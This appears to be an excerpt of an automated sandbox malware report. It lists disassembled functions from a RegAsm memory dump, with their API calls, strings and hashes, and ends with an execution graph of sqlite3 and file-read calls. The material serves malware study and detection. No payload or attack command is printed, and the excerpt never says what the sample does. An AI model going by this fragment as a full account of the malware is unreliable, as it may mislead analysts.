                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: _wcsnlen
                                              • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                              • API String ID: 3628947076-1387797911
                                              • Opcode ID: 3df32087d6d62c198e9d861759cc50e52802bb9296cdaf35164c9461750bfccc
                                              • Instruction ID: aaad113684877de57c1f2fe0de21dd6c7d92faf8e92cf33e26616104813a0550
                                              • Opcode Fuzzy Hash: 3df32087d6d62c198e9d861759cc50e52802bb9296cdaf35164c9461750bfccc
                                              • Instruction Fuzzy Hash: 9F41A572260308BFF7019AE0CC51FEEBBADDF05748F100511FA05A9594D7B0DA508BA5
                                              Function 022513CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 7059da121981bb1ef073fd9dd5e89f385a4705384a6826bfdc2a5076e7bc6a3a
                                              • Instruction ID: 1072caf8f65fccd19631aa6784ccb2658822f685acdd4c7057d419bf53c566c2
                                              • Opcode Fuzzy Hash: 7059da121981bb1ef073fd9dd5e89f385a4705384a6826bfdc2a5076e7bc6a3a
                                              • Instruction Fuzzy Hash: 87614871D20666AACF34DFD9C890ABFBBF5EF84300B54C02DE89A47548D774A650CB60
                                              Function 022B3B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: e397ce8b3266b084d04401a4530571cdf255172ac00143410bc707d415dfd4d4
                                              • Instruction ID: a07980cbafa03e746557a09d61f9a7b14ce8e901c42c62719043a3400c7ac003
                                              • Opcode Fuzzy Hash: e397ce8b3266b084d04401a4530571cdf255172ac00143410bc707d415dfd4d4
                                              • Instruction Fuzzy Hash: 6361C671920645EBDF26DFD8C8409BEBBF5EF58351B14C5A9F8A997108E370EA80CB50
                                              Function 02247EFD Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                              Download Yara Rule
                                              APIs
                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02263F12
                                              Strings
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 0226E345
                                              • 'F, xrefs: 02247F1E
                                              • ExecuteOptions, xrefs: 02263F04
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02263EC4
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02263F75
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02263F4A
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0226E2FB
                                              • Execute=1, xrefs: 02263F5E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: BaseDataModuleQuery
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$'F
                                              • API String ID: 3901378454-1435842402
                                              • Opcode ID: 7a6af82c5add31ef90483286a3cdba0aa9eefb8986231c10e479a5eddc34ec9f
                                              • Instruction ID: 5d1e70148f1f6289083b7f93894d97794ae76e52519306dde6e76d8dcbec6d55
                                              • Opcode Fuzzy Hash: 7a6af82c5add31ef90483286a3cdba0aa9eefb8986231c10e479a5eddc34ec9f
                                              • Instruction Fuzzy Hash: 2F41CB326A071DBAEB20DAD4DC89FEA73FDAF14704F0105A5B505A6084EFB19A858F61
                                              Function 02250B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: __fassign
                                              • String ID: .$:$:
                                              • API String ID: 3965848254-2308638275
                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                              • Instruction ID: 6f694c650ed135ddfb35797e1fcef9a6cd64f29e10a267f2ab75c12aac709f6f
                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                              • Instruction Fuzzy Hash: 61A17C71D2432ADACB24CFE8CC446AEB7B5AB0A309F24C46ADC42A7249D7749B45CB51
                                              Function 02250554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02272206
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-4236105082
                                              • Opcode ID: b51791ee2db81f78d037c205add8b0c8a644145da759e916b19a3eb537530106
                                              • Instruction ID: a4eba7f86b97e0f46f107732bd61859a8f56cf4f95b36d1c82ea1c259f499823
                                              • Opcode Fuzzy Hash: b51791ee2db81f78d037c205add8b0c8a644145da759e916b19a3eb537530106
                                              • Instruction Fuzzy Hash: 37513C71724312AFEB14DA98CC80F6673AAAB94710F218359ED49DF28DDA71EC41CB90
                                              Function 022514C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___swprintf_l.LIBCMT ref: 0227EA22
                                                • Part of subcall function 022513CB: ___swprintf_l.LIBCMT ref: 0225146B
                                                • Part of subcall function 022513CB: ___swprintf_l.LIBCMT ref: 02251490
                                              • ___swprintf_l.LIBCMT ref: 0225156D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: 16c8e36dae7e733e358d41611ea90af329ed147311770a51c55e6e1ea6981505
                                              • Instruction ID: 5673fddcaeabd72ed20d357fad5692631d9f738e1786ca2d861327bf7a42f509
                                              • Opcode Fuzzy Hash: 16c8e36dae7e733e358d41611ea90af329ed147311770a51c55e6e1ea6981505
                                              • Instruction Fuzzy Hash: 9421C5729202299BDB20DED4CC40FEE73BDAF10704F458555EC4AD3148DB70EA688BE1
                                              Function 022B3DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: 6ea3a81bc8787e2abe58cbb1567777673c9dae1d40c734304133e9dd78dd26bd
                                              • Instruction ID: 4be06638bd5d64b046c5a6da22f4c8ee9f9c32ebfb234bd879bd7712148454e1
                                              • Opcode Fuzzy Hash: 6ea3a81bc8787e2abe58cbb1567777673c9dae1d40c734304133e9dd78dd26bd
                                              • Instruction Fuzzy Hash: C721C17692021AABDB21EEE88C44DEF77ED9F14794F040566FC05A3209E7709A44CBE1
                                              Function 022353A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022722F4
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 02272328
                                              • RTL: Resource at %p, xrefs: 0227230B
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 022722FC
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-871070163
                                              • Opcode ID: 7411ef1ab77590d16b020395292a4fd6771edaabc458cd4fa08855bc861e9b37
                                              • Instruction ID: 91c3346d3b9ff3bbda1f146563933950cba0b1f402a73275acce89a36d22b176
                                              • Opcode Fuzzy Hash: 7411ef1ab77590d16b020395292a4fd6771edaabc458cd4fa08855bc861e9b37
                                              • Instruction Fuzzy Hash: 805108B1621716ABDB25DBB4CC80FA673D9EF58724F104259FD09DF288EB71E8418B90
                                              Function 0223EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 022724FA
                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0227248D
                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 022724BD
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                              • API String ID: 0-3177188983
                                              • Opcode ID: f35f95ae473467093b06b0d93e16bb28b9cd51209bb75a151c30085d32a0b68c
                                              • Instruction ID: 17622630827798d9f5d4d39b3e5ce0b64a2ff8e7f881b57bc95fb7f27a23e637
                                              • Opcode Fuzzy Hash: f35f95ae473467093b06b0d93e16bb28b9cd51209bb75a151c30085d32a0b68c
                                              • Instruction Fuzzy Hash: 7741C6B0A24305EBD720DEE4CC84FAA77EAAF45720F108615F9559B2C8D774E541CB60
                                              Function 0224FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: __fassign
                                              • String ID:
                                              • API String ID: 3965848254-0
                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                              • Instruction ID: 55f0449d7fec94d8fd13f6dbe8923a7a5aa74a5d597137423cea46a024b5c01e
                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                              • Instruction Fuzzy Hash: A691A331E2021AEEDF28CFD5C9447AEB7B5FF85309F20806AD805AB559EB705A41CF91
                                              Function 022C5CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: $$0
                                              • API String ID: 1302938615-389342756
                                              • Opcode ID: b84f633d0c496414da12d21d26c5771859a3cce54c4ab09265fafc47dd8c89e0
                                              • Instruction ID: cd8b8d010fab2f29a7e4067305a353df513f6ef0dad11442ac144c20de40babc
                                              • Opcode Fuzzy Hash: b84f633d0c496414da12d21d26c5771859a3cce54c4ab09265fafc47dd8c89e0
                                              • Instruction Fuzzy Hash: E191AF70C2439A9ACF24CFD888843ADBBB1AF05314FA4475EE4A1B6299C774A661CB50

                                              Execution Graph

                                              Execution Coverage:1.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0.4%
                                              Total number of Nodes:453
                                              Total number of Limit Nodes:72
                                              execution_graph 27544 61e42110 27545 61e42127 27544->27545 27548 61e42170 27544->27548 27547 61e42167 27545->27547 27545->27548 27574 61e0a6bf sqlite3_free 27545->27574 27547->27548 27550 61e421d4 27547->27550 27575 61e16fd1 6 API calls 27547->27575 27550->27548 27551 61e422dc 27550->27551 27560 61e42220 27550->27560 27552 61e42361 27551->27552 27566 61e42355 27551->27566 27581 61e41e58 20 API calls 27551->27581 27557 61e4252a 27552->27557 27564 61e42545 27552->27564 27582 61e18945 31 API calls 27552->27582 27583 61e41e58 20 API calls 27552->27583 27554 61e4229c 27556 61e422a9 27554->27556 27580 61e1aaff 9 API calls 27554->27580 27556->27548 27563 61e228e5 21 API calls 27556->27563 27558 61e4253b 27557->27558 27557->27566 27587 61e0a6bf sqlite3_free 27558->27587 27560->27554 27560->27556 27576 61e228e5 27560->27576 27561 61e424d0 27568 61e42503 27561->27568 27585 61e41e58 20 API calls 27561->27585 27563->27556 27564->27566 27567 61e4254f 27564->27567 27566->27561 27584 61e1aaff 9 API calls 27566->27584 27588 61e0a6bf sqlite3_free 27567->27588 27586 61e0a6bf sqlite3_free 27568->27586 27574->27545 27575->27550 27577 61e228fc 27576->27577 27579 61e22909 27577->27579 27589 61e227c6 27577->27589 27579->27560 27580->27556 27581->27551 27582->27552 27583->27552 27584->27561 27585->27561 27586->27548 27587->27548 27588->27548 27590 61e22853 27589->27590 27591 61e227e5 27589->27591 27601 61e226e7 10 API calls 27590->27601 27593 61e22866 27591->27593 27594 61e227ef 27591->27594 27597 61e22851 27591->27597 27598 61e014e3 27593->27598 27595 61e014e3 17 API calls 27594->27595 27595->27597 27597->27579 27602 61e2e6d9 27598->27602 27601->27591 27603 61e2e703 27602->27603 27604 61e2e76d ReadFile 27603->27604 27605 61e2e796 27603->27605 27607 61e0150a 27603->27607 27609 61e2e7c9 27603->27609 27612 61e2dd21 sqlite3_win32_sleep 27603->27612 27604->27603 27604->27605 27611 61e20876 sqlite3_log 27605->27611 27607->27597 27613 61e2dff6 14 API calls 27609->27613 27611->27607 27612->27603 27613->27607 27614 61e9734f sqlite3_initialize 27615 61e9736d 27614->27615 27616 61e973de 27614->27616 27622 61e15853 14 API calls 27615->27622 27618 61e97398 27621 61e973bb 27618->27621 27623 61e96de5 sqlite3_initialize 27618->27623 27685 61e0a64a sqlite3_free 27621->27685 27622->27618 27624 61e97314 27623->27624 27625 61e96e18 27623->27625 27624->27621 27686 61e16cd5 27625->27686 27627 61e97310 27628 61e972d3 sqlite3_errcode 27627->27628 27631 61e972ee 27628->27631 27632 61e972e2 sqlite3_close 27628->27632 27629 61e96e9c sqlite3_mutex_enter 27689 61e28834 27629->27689 27635 61e972f9 sqlite3_free_filename 27631->27635 27632->27635 27633 61e96e70 27633->27627 27633->27629 27637 61e96e8f sqlite3_free 27633->27637 27635->27624 27636 61e28834 20 API calls 27638 61e96fc8 27636->27638 27637->27627 27639 61e28834 20 API calls 27638->27639 27640 61e96ff0 27639->27640 27641 61e28834 20 API calls 27640->27641 27642 61e97018 27641->27642 27643 61e28834 20 API calls 27642->27643 27644 61e97040 27643->27644 27645 61e972c8 sqlite3_mutex_leave 27644->27645 27646 61e97069 27644->27646 27647 61e9705d 27644->27647 27645->27628 27763 61e3b989 13 API calls 27646->27763 27762 61e22948 sqlite3_log 27647->27762 27650 61e97067 27651 61e9708e 27650->27651 27652 61e970d0 27650->27652 27764 61e28077 16 API calls 27651->27764 27700 61e4b183 27652->27700 27656 61e970c0 sqlite3_free 27656->27645 27657 61e970fb 27765 61e0afda 27657->27765 27658 61e97116 27769 61e17a8a 27658->27769 27662 61e97121 27778 61e1b51c sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 27662->27778 27664 61e9712e 27665 61e97148 27664->27665 27779 61e16b2a 11 API calls 27664->27779 27780 61e1b51c sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 27665->27780 27668 61e9715f 27668->27645 27669 61e0afda sqlite3_free 27668->27669 27670 61e97197 sqlite3_overload_function 27669->27670 27671 61e971bb sqlite3_errcode 27670->27671 27672 61e971b4 27670->27672 27673 61e971c5 27671->27673 27672->27671 27674 61e97298 27673->27674 27683 61e971e3 27673->27683 27675 61e0afda sqlite3_free 27674->27675 27678 61e971fe 27675->27678 27676 61e971ee sqlite3_errcode 27676->27645 27676->27678 27782 61e1214e 7 API calls 27678->27782 27679 61e972b8 sqlite3_wal_autocheckpoint 27679->27645 27680 61e9720d sqlite3_mutex_enter 27680->27683 27681 61e97237 sqlite3_mutex_leave 27682 61e97285 sqlite3_free 27681->27682 27681->27683 27682->27683 27683->27676 27683->27680 27683->27681 27683->27682 27781 61e28077 16 API calls 27683->27781 27685->27616 27783 61e11c21 27686->27783 27690 61e2886b 27689->27690 27797 61e16afb 27690->27797 27692 61e28894 27695 61e288f8 27692->27695 27699 61e2889a 27692->27699 27693 61e16afb 11 API calls 27694 61e288ad 27693->27694 27697 61e0afda sqlite3_free 27694->27697 27698 61e288e2 27694->27698 27802 61e28077 16 API calls 27695->27802 27697->27698 27698->27636 27699->27693 27701 61e4b1a5 strcmp 27700->27701 27702 61e4b1cf 27700->27702 27701->27702 27733 61e4b4f8 27701->27733 27703 61e16cd5 6 API calls 27702->27703 27702->27733 27712 61e4b22f 27703->27712 27704 61e16cd5 6 API calls 27705 61e4b6e8 27704->27705 27707 61e4b700 27705->27707 27708 61e4b6ee 27705->27708 27706 61e4be68 27706->27657 27706->27658 27711 61e0a13a sqlite3_free 27707->27711 27732 61e4b7dd 27707->27732 27709 61e0a13a sqlite3_free 27708->27709 27713 61e4b6fb 27709->27713 27710 61e16cd5 6 API calls 27720 61e4b48a 27710->27720 27711->27732 27712->27706 27715 61e11c21 6 API calls 27712->27715 27746 61e4b472 27712->27746 27714 61e4badd sqlite3_free sqlite3_free 27713->27714 27827 61e4b091 66 API calls 27713->27827 27755 61e4ba94 27714->27755 27719 61e4b2c2 27715->27719 27716 61e18666 19 API calls 27717 61e4bc62 27716->27717 27721 61e4b848 27717->27721 27824 61e0b1d2 27717->27824 27723 61e4b2d8 sqlite3_free 27719->27723 27724 61e4b2ea 27719->27724 27722 61e4bad8 27720->27722 27728 61e11c21 6 API calls 27720->27728 27720->27733 27741 61e4b656 27721->27741 27823 61e0b25b 